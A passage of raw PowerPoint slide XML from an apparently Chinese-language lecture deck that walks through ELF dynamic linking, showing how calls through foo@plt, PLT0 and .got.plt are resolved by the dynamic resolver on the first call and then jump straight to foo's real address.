              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13665858-6BB1-40D6-8FDA-C57B57CF3B28}"/>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Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>下的可执行文件格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26781806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7" name="Shape 967"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400"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call foo@plt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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="968" name="Shape 968"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="42105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printf</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="969" name="Shape 969"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="46201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foo@plt+6</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="970" name="Shape 970"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="50297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bar</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="971" name="Shape 971"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>call _fix_up</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>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ret 0xc</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="972" name="Shape 972"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000"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.text</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="973" name="Shape 973"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="1564600"/>
            <a:ext cx="17208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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>dl_resolve</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="974" name="Shape 974"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="54393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975" name="Shape 975"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>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.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E312383-95D4-4D97-B4D3-4AAE3740E8C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="5121980" cy="646331"/>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__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>dl_runtime_resolve</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函数解析 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的真正地址</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填入 </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got.plt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中</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F405480B-D0E5-47AE-B0FA-89E6DDE05470}"/>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动态链接过程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2" name="Shape 982"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400"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call foo@plt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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="983" name="Shape 983"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="42105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printf</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="984" name="Shape 984"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4620100"/>
            <a:ext cx="20952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foo</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985" name="Shape 985"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="50297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bar</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="986" name="Shape 986"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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call _fix_up</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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret 0xc</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="987" name="Shape 987"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000"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.text</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="988" name="Shape 988"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="1564600"/>
            <a:ext cx="17208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dl_resolve</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="989" name="Shape 989"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="54393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990" name="Shape 990"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>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.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5119F5D-D863-43DA-84B1-185CF9064524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="4394152"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此后 </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got.plt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中保存的是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的真实地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1795C130-E5EC-42BF-9F84-EE1C6E1ABDA4}"/>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动态链接过程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7" name="Shape 997"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400"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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>call foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="998" name="Shape 998"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="42105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printf</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="999" name="Shape 999"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4620100"/>
            <a:ext cx="20952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foo</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1000" name="Shape 1000"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="50297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bar</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1001" name="Shape 1001"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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jmp *(foo@GOT)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push index</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jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002" name="Shape 1002"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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push *(GOT+4)</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jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003" name="Shape 1003"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000"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.text</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1004" name="Shape 1004"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1005" name="Shape 1005"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1006" name="Shape 1006"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="54393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1007" name="Shape 1007"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>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.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C92709A-9564-4B8A-BDA3-B65E1FD937C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="222849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进程第二次调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>foo</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57211A77-E38D-492B-8A1A-EF4BDA9F558B}"/>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动态链接过程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sp>
        <p:nvSpPr>
          <p:cNvPr id="1014" name="Shape 1014"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400"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call foo@plt</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1015" name="Shape 1015"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="42105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printf</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1016" name="Shape 1016"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4620100"/>
            <a:ext cx="20952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foo</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1017" name="Shape 1017"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="50297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bar</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1018" name="Shape 1018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push index</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1019" name="Shape 1019"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="2033033"/>
            <a:ext cx="2248400" cy="139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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push *(GOT+4)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1020" name="Shape 1020"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000"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.text</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1021" name="Shape 1021"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
